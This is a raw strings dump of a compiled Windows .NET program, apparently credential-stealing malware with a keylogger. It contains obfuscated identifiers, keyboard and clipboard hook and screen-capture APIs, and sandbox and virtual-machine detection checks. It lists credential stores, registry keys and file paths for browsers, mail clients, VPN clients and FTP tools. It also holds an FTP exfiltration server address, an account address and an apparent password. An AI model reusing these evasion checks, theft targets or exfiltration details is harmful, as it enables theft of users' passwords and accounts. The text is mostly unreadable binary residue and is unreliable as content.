!This program cannot be run in DOS mode.
`.rsrc
@.reloc
com.apple.Safari
Unable to resolve HTTP prox
1SPS*
KDBM(A
v4.0.30319
#Strings
E i }
8 Q [ c i s {
!.!F!f!
"1":"@"M"T"r"
"1#:#A#I#_#
EL2L20
lES7hll2390
8siL7vQXKQ0
OBUI0LMU0
Sn6BMIe0
r6L0rfhk5f0
a8pwFg0
ibo31EPl0
tc9ap0
DvPLtry0
$$method0x6000123-1
$$method0x6000095-1
$$method0x6000086-1
$$method0x6000108-1
$$method0x6000128-1
$$method0x6000148-1
$$method0x6000268-1
$$method0x6000129-1
$$method0x600019a-1
$$method0x600010e-1
$$method0x600011e-1
k2WV31
HMACSHA1
VT_UI1
bPN1geV3kI1
HFxFY1
IEnumerable`1
ICollection`1
IEnumerator`1
IList`1
xFPPpUzb1
bFo3nv3d1
CS$<>9__CachedAnonymousMethodDelegate1
dtZpBMf1
kCNIuk1
get_Item1
7LhL886wco1
kHEX9p1
qOJdOmu1
$$method0x6000108-2
$$method0x6000268-2
$$method0x600011e-2
HMACSHA512
Advapi32
kernel32
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
VT_UI2
3xmaWO2
6rCLlY2
KeyValuePair`2
Dictionary`2
6ikAtFYGc2
sNU78f6tg2
get_Item2
nDZybbwm2
uursVvgmq2
Z3Tdt2
rAOGqv2
BE4RCSRp93
toFcVgEkL3
Tuple`3
DKDQZPfb3
pQZ72zb3
e6c7e90e-20ff-4cd0-a277-0023958459c3
get_Item3
VWZCQOmb1s3
ToUInt64
ReadInt64
ToInt64
8R1ozveRyC4
dFsgrwasD4
nSHQI4In3E4
VT_UI4
mEpeNJ4
d3sORnCRT4
vn6KbU4
IT7fDm31W4
Dyz9rVu25
dxpn99835
0c1MC5
sCyu0kXRT5
TALCs940KY5
rBibeBKbi5
Bl4w5Tm5
Z22WRds06
IS_TEXT_UNICODE_ASCII16
IS_TEXT_UNICODE_REVERSE_ASCII16
ToUInt16
ReadInt16
ToInt16
HMACSHA256
weHWjLk56
NQqZqVW6
tQMa4Y5Y6
npopeWeue6
Q8FkNn6
IddplTOo6
hgfsZrw6
vM1BV47
f3F7FB57
ppptmN7
i2lrZhX7
DKKvvgIaYh7
pqKRm7
hvfco7
Sok8s7
koYNtRGz7
get_UTF8
ba4gj7G8
VT_UI8
VaultGetItem_WIN8
15aIb5fS8
X51EeAQ0T8
SPdoT8
cqnjfLE6zg8
MkaGK1o8
NpC6VNQ39
R3wLC9
dr84kCF9
GLV0GKbF9
QUiZDqVgR9
7DgM9XU9
i4k6AYth9
lRZowitE4k9
PpGFBl9
NqBFNw9
7Au0wz9
<Module>
Vbgv2A
ribTBh98NA
IMTJnrNA
lsfjHGXAdUA
ghHbcA
yJPTZ2B
1D8ZlIB
BCRYPT_KEY_DATA_BLOB
VT_BLOB
S8h11bvTQUB
tZSaJzQY4fB
4eBQcgaCgB
87uonB
wUNrgPgtB
C0JLxB
Evr8Max1C
a8AHhR3C
xtk5AC
BCRYPT_KEY_DATA_BLOB_MAGIC
q0qSdiPC
il0gQCiC
C6vRTZzjC
ZZBTJqC
FaWLca3JosC
VduIEL3VQ0D
Jhic9D
zde6CD
LLKHF_EXTENDED
LLKHF_INJECTED
VT_CLSID
get_ID
set_ID
FileHandleID
fileHandleID
lpdwProcessID
processID
get_FormatID
set_FormatID
THjZLD
vu80Zjp6PD
PuzrAPQD
TWk3MwzuVaD
JMR8ruJkYaD
Mm0TNfwfD
mDVyYOzkD
CB5wiebpsnD
7hO8luD
vXSWnjAU8E
DUPLICATE_CLOSE_SOURCE
lSenXeZCE
BCRYPT_CHAINING_MODE
VT_STORAGE
INVALID_HANDLE
VT_FILETIME
41XVqLQE
IS_TEXT_UNICODE_SIGNATURE
IS_TEXT_UNICODE_REVERSE_SIGNATURE
VT_DATE
IS_TEXT_UNICODE_DBCS_LEADBYTE
jG48tlmE
WTduXr2ppxE
Xl4q5Tu3F
Qd5OnAF
tYtGcS3JEJF
vz46ggrVXPF
gTjqEAucF
PUkK7RueF
0VkLTjoVfF
79ow7G
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
0rwJCG
CbIMMG
a4IiP6O9HNG
bmIdWaFpOG
EbkdZG
5Jgw7fwGIcG
2WrzcG
7HvRHhG
xXCJljG
gculWaVDqG
SiUXLSdWB0H
STATUS_AUTH_TAG_MISMATCH
STATUS_INFO_LENGTH_MISMATCH
IS_TEXT_UNICODE_ODD_LENGTH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
7PR9TqAxH
lqgi0I
W2THTbP9I
get_ASCII
Gx9kkSI
fHmYpYRhI
wSXhlI
vZdUMrI
u9cZoLTsI
rvb4AJ
zMdmu4Xb8EJ
q0dvJJ
PErN5RefUJ
YfKA4K
wuQOhIFK
xGwWMIXGWGK
2tkOh19RgNK
IS_TEXT_UNICODE_UNICODE_MASK
IS_TEXT_UNICODE_NOT_UNICODE_MASK
IS_TEXT_UNICODE_REVERSE_MASK
IS_TEXT_UNICODE_NOT_ASCII_MASK
B3tFH5BTK
mZjatEWK
RxzQYK
L9bqnz1bXZK
j9lJ1zxcK
NnnX1BELQrK
xvrOqTFtK
LTg9hhJK1L
5SwYW1L
1VdiYgE943L
VT_DECIMAL
nCv66YCL
Ib5BjcIIGL
VT_NULL
WH_KEYBOARD_LL
VT_BOOL
Cvt2gbHWL
WY0QDdBgL
G2Vb9hL
gwH4ZiL
HidWUer41M
jmyVl7M
VT_VERSIONED_STREAM
VT_STREAM
BCRYPT_CHAIN_MODE_GCM
r0sk2FM
BCRYPT_AES_ALGORITHM
k6UCckwcNM
4yora87HOM
UkcgjqM
THEmhaHrzM
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
HC_ACTION
KLhJmaON
LLKHF_ALTDOWN
WM_SYSKEYDOWN
WM_KEYDOWN
m1cUgN
VzXMlN
D6kVfZxB9nN
kStUnsN
gdg33O
ZV8hUK1oE9O
System.IO
CeJ2azOOO
ZTPXHhfO
Rok6XFwO
BCRYPT_PAD_OAEP
vLqUhRPP
cvJoIjSP
WM_SYSKEYUP
WM_KEYUP
LLKHF_UP
GA6GaP
K1CarP
NkUH6uAQ
1esKpPLQ
cnVP7OLxOQ
vxdAMIQQ
734B6A7StdQ
cBkAtKeQ
XvxXYWk3oqQ
pWwyL7gm2R
DD3Gehi35R
BRrPoAR
MS_PRIMITIVE_PROVIDER
2IDzER
uzl7u22KR
reuEtKR
VT_ERROR
VT_VECTOR
VT_BSTR
VT_LPSTR
VT_LPWSTR
iBsY49UR
MN0sw9kWR
eUHUzeR
5v8AnkR
heK1vR
IS_TEXT_UNICODE_STATISTICS
IS_TEXT_UNICODE_REVERSE_STATISTICS
IS_TEXT_UNICODE_NULL_BYTES
IS_TEXT_UNICODE_CONTROLS
IS_TEXT_UNICODE_REVERSE_CONTROLS
IS_TEXT_UNICODE_ILLEGAL_CHARS
DUPLICATE_SAME_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
BCRYPT_PAD_PSS
Qe7dt7yjTS
H3HHIGQbS
7KfWJ7iS
PFo63WOArjS
acWIxS
snuFIQpk9T
wjK7AT
4qcNI4uuIT
VT_UINT
VT_INT
EYAPsVT
R04PhwF32XT
AYJfW7qXT
4ELCYT
5rq28NqiYT
oTKCMaT
sUT8bT
8mh0MfDqYfT
ERC5EapbfT
vPedQRHkT
9ZbemT
fhGC3y1nT
itceMKkcDsT
SlLLAL7PwT
clVB41y3U
rO4KR0I6U
IZa6bfaJHU
TXTsNU
7tCewn6aU
TWV9RmG9JrU
UIVfe9IMDV
get_IV
set_IV
wn67zxo2EMV
MY0OEywQV
BIgVTV
t34rbmwUV
U3ixeIQfgV
deTCKtYF1W
JjRq1W
AEF5VUhgQ4W
fGykVGW
STATUS_BUFFER_OVERFLOW
gDrmEiTaW
EaTlCdQhW
medaanW
YT7whpW
cATfqFcMitW
iMi2ZduU0GX
LwyyweSrfX
n7RgKHCWjX
VMwS49MgjX
C35E8w2pX
VT_ARRAY
VT_EMPTY
oAemKbY
lpyUARcY
NwlfaD3Z
xPYGcZZ
LZrxdzYvSdZ
CC9Q0XqLzlZ
rPkFknZ
RWlGixZ
value__
3zF10a
MoNna3wpI1a
EqLl8Da
Fs84QZz9DMa
X2hapba
JJkRMh4HFha
NwK7lRZna
zFmJmhNGsa
xCsHsa
get_Data
set_Data
cbData
ProtectedData
cbAuthData
pbAuthData
PropertyData
SetQuota
NETugSb
XuksXb
PublicIpAddressGrab
UIkuD2shb
mscorlib
5KrR8UAYqb
0PMy0dJi0c
OSEWa5c
cnHWUIho6c
GHkZRsyBNIc
LdpkLc
k4um9LyPc
xlSsB6hc
System.Collections.Generic
Microsoft.VisualBasic
WndProc
HookProc
FromFileTimeUtc
phaikCLwy6d
1WSG8d
SC0K54719d
get_Id
SchemaId
schemaId
pszAlgId
HookId
GetWindowThreadProcessId
processId
SchemaElementId
BD3cJd
Y2COPLd
yqYqfrsU2Ud
JmIN0IIRVd
JRtSkosVd
PageExecuteRead
OpenRead
FileMapRead
VirtualMemoryRead
CreateThread
t3Qxho3Sdd
lpcbNeeded
DomainExtended
SHA1Managed
RijndaelManaged
add_Changed
remove_Changed
get_LastModified
set_LastModified
_lastModified
Interlocked
set_Enabled
get_IsEnabled
set_IsEnabled
_enabled
Undefined
lpOverlapped
samDesired
add_Elapsed
get_LastAccessed
set_LastAccessed
_lastAccessed
get_Reserved
reserved
TorPid
activeWindowPid
pPackageSid
row_id
get_IsInvalid
get_Guid
vaultGuid
PcHwid
<ID>k__BackingField
<FormatID>k__BackingField
<Data>k__BackingField
<LastModified>k__BackingField
<IsEnabled>k__BackingField
<LastAccessed>k__BackingField
<Password>k__BackingField
<password>k__BackingField
<PropertyStorage>k__BackingField
<Name>k__BackingField
<FileName>k__BackingField
<ApplicationName>k__BackingField
<Username>k__BackingField
<username>k__BackingField
<Type>k__BackingField
<type>k__BackingField
<TypedPropertyValue>k__BackingField
<Size>k__BackingField
<IsRunning>k__BackingField
<Path>k__BackingField
<hostmask>k__BackingField
<Version>k__BackingField
<Application>k__BackingField
<Description>k__BackingField
<user>k__BackingField
<hoster>k__BackingField
<Tasks>k__BackingField
<Contacts>k__BackingField
<objects>k__BackingField
<Accounts>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<Host>k__BackingField
<GuidMasterKey>k__BackingField
GetField
TrimEnd
ReadToEnd
AppEnd
Append
get_Millisecond
GetUpperBound
GetLowerBound
set_Method
method
Clipboard
get_Password
set_Password
DomainPassword
FtpPassword
get_password
set_password
IhL1dFe
Replace
DeleteBackspace
QueryDosDevice
hInstance
IdentityReference
Sequence
cbNonce
pbNonce
Resource
vkCode
wScanCode
scanCode
keyCode
set_Mode
FileMode
ShareMode
PaddingMode
CryptoStreamMode
CipherMode
SelectSingleNode
XmlNode
get_Unicode
get_BigEndianUnicode
IsTextUnicode
FromImage
SectionImage
get_PropertyStorage
set_PropertyStorage
SerializedPropertyStorage
SendMessage
AddRange
CompareExchange
CredentialCache
SectionNoCache
97pz06gke
EndInvoke
BeginInvoke
GetEnvironmentVariable
SetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
hSourceHandle
SafeHandle
GetModuleHandle
RuntimeTypeHandle
ReleaseHandle
CloseHandle
DuplicateHandle
CreateHandle
GetTypeFromHandle
hSourceProcessHandle
hTargetProcessHandle
lpTargetHandle
bInheritHandle
vaultHandle
activeWindowHandle
handle
Rectangle
ToSingle
CreateFile
hTemplateFile
DeleteFile
WriteFile
MoveFile
MapViewOfFile
UnmapViewOfFile
lastTitle
activeWindowTitle
lphModule
get_MainModule
ProcessModule
get_Name
set_Name
lpDeviceName
get_FileName
set_FileName
GetModuleFileName
lpExistingFileName
lpFileName
GetFileName
lpNewFileName
_fileName
get_ModuleName
lpModuleName
lpBaseName
baseName
lpValueName
StartupRegName
rootPathName
get_OSFullName
get_FullName
OperatingSystemName
get_ApplicationName
set_ApplicationName
StartupInstallationName
lpName
lpAppName
get_UserName
get_ComputerName
ThisComputerName
ProcessorName
get_ProcessName
processName
StartupEnvName
GetProcessesByName
lpKeyName
pszCredentialFriendlyName
StartupDirectoryName
GetDirectoryName
astable_name
item_name
Filename
filename
get_Username
set_Username
get_username
set_username
DateTime
GetLastAccessTime
dwTime
AppendLine
get_NewLine
Combine
LocalMachine
Escape
Unescape
DataProtectionScope
get_Type
set_Type
pszBlobType
GetFileType
MimeType
ValueType
LogType
SecurityProtocolType
GetType
item_type
get_type
set_type
FileShare
Compare
System.Core
PtrToStructure
get_InvariantCulture
Capture
HttpWebResponse
GetResponse
Dispose
Reverse
X509Certificate
GenericCertificate
DomainCertificate
Create
KBDLLHookProcDelegate
MulticastDelegate
Terminate
PcState
GetKeyboardState
lpKeyState
GetKeyState
Delete
PageReadWrite
PageExecuteReadWrite
nNumberOfBytesToWrite
FileMapWrite
VirtualMemoryWrite
Remote
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
SecuritySafeCriticalAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
ReliabilityContractAttribute
ParamArrayAttribute
RuntimeCompatibilityAttribute
SuppressUnmanagedCodeSecurityAttribute
set_UseShellExecute
FileMapExecute
ReadByte
ToByte
get_Value
HandleValue
TryGetValue
get_TypedPropertyValue
set_TypedPropertyValue
GetPropertyValue
set_KeepAlive
Remove
SectionReserve
3QVjg5bayve
zI519xe
get_Size
set_Size
dataSize
cbSize
get_StorageSize
lpFileSize
get_NameSize
volumeNameSize
nFileSystemNameSize
SQLDataTypeSize
get_StoreSize
get_ValueSize
get_HashSize
set_BlockSize
chunkSize
get_KeySize
Serialize
Deserialize
Initialize
Finalize
Synchronize
page_size
Resize
e4jXp1f
SgPa7f
gf1atV9f
9j3xDBf
kKs7CvEGGf
80gCa7Mf
SizeOf
get_ItemOf
LastIndexOf
xfpPPf
vtDk2j1ijVf
eLExHjN20af
cchBuff
lastInputInf
PJjVp6U2g
w3WREg
TbWLevFg
sYe6x5AnCLg
k9x7KUoMg
D5G5DNcXhTg
get_Jpeg
System.Threading
get_Padding
set_Padding
UTF8Encoding
encoding
System.Drawing.Imaging
get_IsRunning
set_IsRunning
CreateFileMapping
FromBase64String
ToBase64String
EscapeDataString
UnescapeDataString
DownloadString
lpReturnedString
GetPrivateProfileString
ToString
GetString
OctetString
BitString
Substring
System.Drawing
get_Msg
0sKGfxg
o2aU9Xh8h
HyHkNh
kyfmIeOh
dwMaximumSizeHigh
dwFileOffsetHigh
kmzAhgMhh
cWn1JI87jnh
nckoieL8qh
ComputeHash
get_Path
set_Path
SystemAppdataPath
get_ExecutablePath
AsmFilePath
AppStartupFullPath
GetTempPath
GetFolderPath
lpTargetPath
StartupDirectoryPath
get_Width
get_Length
MaximumLength
dwMinLength
SystemInformationLength
ObjectInformationLength
set_MaxJsonLength
ReturnLength
maximumComponentLength
set_ContentLength
GetWindowTextLength
dwMaxLength
EndsWith
StartsWith
uNH1mlRXvPi
QYjYoUDCai
f9LOhi
PtrToStringUni
StringToHGlobalUni
yJaOha1uri
Rf2vsi
XSMKti
ZkNoyi
J8Gn1j
Twt7qKQy6j
LITJ7j
evvF8j
3aX0Hj
EvSssSHj
Vz1porClKj
4wqyyMj
3aaRVj
uds6AQWj
WPLOldj
V47Qtdj
objrij
HOYNblj
uiiuPXnsnj
5jpcrJkyj
Lm6TgRzj
G9827pYku3k
sZY7679w8k
EbSPDk
2acZgsgNk
UeljVgQHTk
EM5NvH1SVk
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
callback
get_CapsLock
TransformFinalBlock
TransformBlock
6RCWC2Thbkk
idHook
_clipboardHook
_keyboardHook
get_hostmask
set_hostmask
dRfW4D7l
3zV1UZl
AllocHGlobal
FreeHGlobal
Illegal
Marshal
NetworkCredential
Decimal
System.Security.Principal
set_Interval
ScreenInterval
KeyloggerInterval
9HIFdl
Rijndael
cbLabel
pbLabel
System.ComponentModel
EnableTorPanel
j5tZfl
T95Ygl
hOdvtRpdUll
Kernel32.dll
kernel32.dll
User32.dll
user32.dll
vaultcli.dll
psapi.dll
ntdll.dll
bcrypt.dll
System.Xml
set_SecurityProtocol
Control
KRhJJVm7C2m
uVrtF2m
Wj4P812lQBm
bn9SPCm
0OXR6flvFm
3hGI9ubvdKm
FileStream
get_BaseStream
GetResponseStream
CryptoStream
GetRequestStream
MemoryStream
get_LParam
get_WParam
get_Param
lParam
wParam
CgGfQLvbm
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
HmacAlgorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
szAwKWTiim
lWR4zsQmm
Random
ICryptoTransform
XDRn7Itm
Maximum
root_num
M8nbd5n
u3IU9VJ7SDn
U4RirSxJn
JXawAvxOn
Upsw7KIhPn
bvbl9E55Qn
ToBoolean
IsLittleEndian
CopyFromScreen
get_PrimaryScreen
lpNumberOfBytesWritten
X509Chain
ChangeClipboardChain
Extension
get_OSVersion
get_Version
set_Version
dwInfoVersion
get_Application
set_Application
get_Location
ObjectDataInformation
SystemRegistryQuotaInformation
SystemBasicInformation
ObjectBasicInformation
QueryLimitedInformation
SystemPerformanceInformation
SystemProcessorPerformanceInformation
SystemLookasideInformation
SystemHandleInformation
ObjectNameInformation
GetVolumeInformation
ObjectTypeInformation
ObjectAllInformation
NtQuerySystemInformation
SystemExceptionInformation
SystemProcessInformation
ObjectInformation
SetInformation
SystemInterruptInformation
SystemTimeOfDayInformation
QueryInformation
VirtualMemoryOperation
pszImplementation
System.Globalization
System.Web.Script.Serialization
System.Reflection
PropertyDataCollection
ValueCollection
MatchCollection
GroupCollection
ManagementObjectCollection
KeyCollection
set_Position
CreationDisposition
SearchOption
Win32Exception
CryptographicException
ArgumentOutOfRangeException
ArgumentException
get_Description
set_Description
get_StatusDescription
_description
System.Runtime.ConstrainedExecution
StringComparison
Zol9iCFeEqn
add_KeyDown
remove_KeyDown
get_CtrlKeyDown
get_ShiftKeyDown
get_AltKeyDown
Unknown
N00ofwMo
8YQMj0EXyNo
rXYoXSXspPo
CompareTo
CopyTo
XAIQqERLSWo
lastInPutNfo
dwExtraInfo
ImageCodecInfo
FieldInfo
FileInfo
CultureInfo
pPaddingInfo
FileSystemInfo
MemberInfo
ComputerInfo
get_StartInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
rbXMZHpOho
jFYUmo
ErDpA6ro
8r6uwBp
tLJOuCp
NczXObXNpIp
add_KeyUp
remove_KeyUp
xIknZp
dwNumberOfBytesToMap
Bitmap
mOVT1Tad0jp
TimeStamp
LocalApp
OSbMhCC6rp
AppAddStartup
HideFileStartup
h0yFWLfHTKq
vlEKfw3RVq
sEoThXhq
OAGQZmq
System.Linq
DWylYjNhPwq
AUjgJ0r
hEzgfMSgc1r
CAQ3kIwS6Dr
umvGOr
ToChar
lpChar
DirectorySeparatorChar
ObjectTypeNumber
volumeSerialNumber
StreamReader
TextReader
BinaryReader
SHA1CryptoServiceProvider
MD5CryptoServiceProvider
RNGCryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
StringBuilder
SpecialFolder
sender
Encoder
volumeNameBuffer
fileSystemNameBuffer
buffer
ServicePointManager
Integer
EnableClipboardLogger
EnableScreenLogger
_screenLogger
_keyLogger
EnableKeylogger
ManagementObjectSearcher
ObjectIdentifier
SecurityIdentifier
ElapsedEventHandler
LogTimer
ToUpper
FtpUser
CurrentUser
get_user
set_user
EncoderParameter
Object_Pointer
BitConverter
get_hoster
set_hoster
BinaryFormatter
SetClipboardViewer
ToLower
JavaScriptSerializer
anROqJgr
get_Major
get_Minor
GetLastWin32Error
GetLastError
Authenticator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
RandomNumberGenerator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
passwordVaultPtr
ReadIntPtr
TtFaCs
Qph6z5Ap5Ws
sqtyVc6eZs
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
GetInstances
get_ChildNodes
Matches
EnableCookies
GetDirectories
master_table_entries
get_Properties
ExpandEnvironmentVariables
GetFiles
EnumProcessModules
NumberStyles
GetSubKeyNames
field_names
ReadAllLines
GetProcesses
System.Security.Cryptography.X509Certificates
FlagsAndAttributes
lpFileMappingAttributes
SecurityAttributes
FileBytes
Rfc2898DeriveBytes
ReadAllBytes
BufferBytes
GetBytes
db_bytes
get_Values
GetLogicalDrives
No2G6v94Yfs
44kyLnHnfs
fileSystemFlags
dwFlags
ElapsedEventArgs
get_Ticks
get_Tasks
set_Tasks
ICredentials
set_Credentials
get_DefaultCredentials
Equals
CreateParams
VaultEnumerateItems
System.Windows.Forms
Contains
System.Web.Extensions
System.Text.RegularExpressions
iterations
System.Collections
set_MaximumAutomaticRedirections
StringSplitOptions
RegexOptions
options
I8NAB0ps
get_Groups
get_Chars
GetImageEncoders
System.Timers
RuntimeHelpers
EncoderParameters
SslPolicyErrors
SystemInformationClass
ObjectInformationClass
ManagementClass
dwDesiredAccess
GrantedAccess
FileAccess
FileMapAllAccess
processAccess
get_Success
CreateProcess
hProcess
OpenProcess
GetCurrentProcess
lpBaseAddress
PublicIpAddress
get_Contacts
set_Contacts
EnableContacts
get_objects
set_objects
VaultEnumerateVaults
pPropertyElements
set_Arguments
get_Accounts
set_Accounts
get_Exists
c1kYkD5us
get_Keys
set_Keys
get_ModifierKeys
4BvHow8t
dOCVCCt
A6s9FIt
akmz2kcRt
wmoPqK9tUt
Concat
AppendFormat
ImageFormat
Subtract
VT_BLOB_Object
VT_STREAMED_Object
VT_STORED_Object
ManagementBaseObject
hFileMappingObject
hObject
ManagementObject
cbKeyObject
pbKeyObject
NtQueryObject
object
Collect
set_AllowAutoRedirect
flProtect
Unprotect
System.Net
offset
get_Height
get_Lenght
set_Lenght
op_Explicit
SectionCommit
WaitForExit
cbSalt
VaultOpenVault
get_Default
lpDefault
pcbResult
IAsyncResult
phkResult
result
UnsignedInt
ToUpperInvariant
set_UserAgent
PublicUserAgent
WebClient
System.Management
pResourceElement
XmlElement
pAuthenticatorElement
pIdentityElement
dwIncrement
sql_statement
Environment
XmlDocument
get_Parent
GetParent
get_Current
CheckRemoteDebuggerPresent
isDebuggerPresent
content
get_Count
get_HandleCount
get_TickCount
vaultItemCount
set_IterationCount
dwPropertiesCount
vaultCount
BCryptDecrypt
BCryptEncrypt
TrimStart
AppStart
Convert
UnsignedShort
FtpWebRequest
HttpWebRequest
XmlNodeList
ToList
MozillaBrowserList
ChromiumBrowserList
get_Host
set_Host
FtpHost
set_Timeout
GetKeyboardLayout
dwLayout
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
LastCopiedText
KeylogText
ReadAllText
AppendAllText
get_InnerText
GetText
GetWindowText
Log_text
cbMacContext
pbMacContext
CTahDN0Eu
GY9QGz63Hu
u2oXfuZD4Iu
dh5TU7Ivu
YtuzmrZZP6v
E19lgFv
3l9Y54F3LGv
rzGFiTv
OtvI4BvVv
aM4dKPCRYv
DIkJQbv
brdDqRsbtv
ToK4yv
xKVhtIAw
oDpl4yD6Ew
jJrSh0xyGw
uYE3Ow
vKtxVlY4Ow
IGs8p6MySw
5smKbzsSlw
dwMaximumSizeLow
dwFileOffsetLow
get_Now
GetForegroundWindow
NativeWindow
set_CreateNoWindow
3qDndZzvw
ToUnicodeEx
GetModuleFileNameEx
RegQueryValueEx
GetFileSizeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
MaximumEx
RegOpenKeyEx
AJ2M8Fx
MS68gc3xLx
YuXdl1WERMx
QeNC0dll2Tx
YMSPUtSTx
59lejTx
0qzRcxArWx
ucchMax
BufferEndIndex
BlockIndex
BufferStartIndex
Lhdxmx
sVCmwx
64B8s2y
ProtectedArray
ToByteArray
InitializeArray
ToArray
ToCharArray
Consistency
get_Key
set_Key
OpenSubKey
subKey
RegCloseKey
get_GuidMasterKey
set_GuidMasterKey
_guidMasterKey
ContainsKey
wVirtKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
_wsftpkey
System.Security.Cryptography
EPwva9iy
dNeY9ufkky
GetExecutingAssembly
PageReadonly
Multiply
PageWriteCopy
BlockCopy
FileMapCopy
System.Runtime.Serialization.Formatters.Binary
AmountOfMemory
get_TotalPhysicalMemory
Directory
Registry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
System.Net.Security
Identity
IsNullOrEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
4T4eQz
oAp7k1FIhgz
WrapNonExceptionThrows
1.0.0.0
$e7b2d959-d554-4cd0-a435-18149c4acae1
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
t t t!t"t#t$t%t&t't(t)t*t+t,t-t.t/t0t1t2t3t4t5t6t7t8t9t:t;t<t=t>t?t@tAtBtEtFtGtHtItLtiy
k#n+n9
5 6 7!8"9#:$;%<&='>(?)@*A+B,C-D0E4F5G6H7I8J9L:O;P=RAUD[F`HfLxRyVzX{[|_}b
CBDBJIKIRQWVXVYV_^fehgigjgkglgmgpo
yyyy_MM_dd_HH_mm_ss
/log.tmp
<html>
</html>
yyyy-MM-dd HH:mm:ss
text/plain
Contacts_
<br>Computer Name:
<br>CPU:
Time:
IP Address:
<br>RAM:
<br>OSFullName:
<br>User Name:
MM/dd/yyyy HH:mm:ss
OSFullName:
User Name:
Recovered!
Time:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
ftp://ftp.antoniomayol.com:21
johnson@antoniomayol.com
cMhKDQUk1{;%
appdata
RaVQVB
RaVQVB.exe
http://ip-api.com/line/?fields=hosting
SbieDll.dll
snxhk.dll
cmdvrt32.dll
Sf2.dll
SxIn.dll
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
root\CIMV2
SELECT * FROM Win32_VideoController
VMware
Select * from Win32_ComputerSystem
]</b> (
{KEYUP}
{BACK}
{KEYDOWN}
{KEYLEFT}
{PageUp}
{CAPSLOCK}
control
{ALT+TAB}
{CTRL}
{Insert}
{PageDown}
{ALT+F4}
{ENTER}
{NumLock}
{KEYRIGHT}
{HOME}
"
<br><hr>Copied Text: <br>
logins
IE/Edge
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
UC Browser
UCBrowser\
Login Data
journal
wow_logins
Safari for Windows
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
<string>
</string>
<data>
</data>
<dict>
<array>
-convert xml1 -s -o "
\fixed_keychain.xml"
\Microsoft\Credentials\
\Microsoft\Protect\
credential
QQ Browser
Tencent\QQBrowser\User Data
\Default\EncryptedStorage
\EncryptedStorage
Profile
entries
category
Password
password_value
IncrediMail
PopPassword
SmtpPassword
Software\IncrediMail\Identities\
\Accounts_New
SmtpServer
EmailAddress
Eudora
Software\Qualcomm\Eudora\CommandLine\
current
Settings
SavePasswordText
ReturnAddress
Falkon Browser
\falkon\profiles\
profiles.ini
startProfile=([A-z0-9\/\.\"]+)
\browsedata.db
autofill
ClawsMail
\Claws-mail
\clawsrc
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
Flock Browser
APPDATA
\Flock\Browser\
signons3.txt
DynDns
username=
password=
https://account.dyn.com/
ALLUSERSPROFILE
Dyn\Updater\config.dyndns
t6KzXhCh
Dyn\Updater\daemon.cfg
global
accounts
account.
username
password
Psi/Psi+
\Psi+\profiles
\accounts.xml
\Psi\profiles
OpenVPN
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
auth-data
entropy
remote
USERPROFILE
\OpenVPN\config\
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
Private Internet Access
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
privateinternetaccess.com
%ProgramW6432%
Private Internet Access\data
ProgramFiles(x86)
\Private Internet Access\data
FileZilla
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
CoreFTP
SOFTWARE\FTPWare\COREFTP\Sites
hdfzpysvpzimorhk
WinSCP
SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
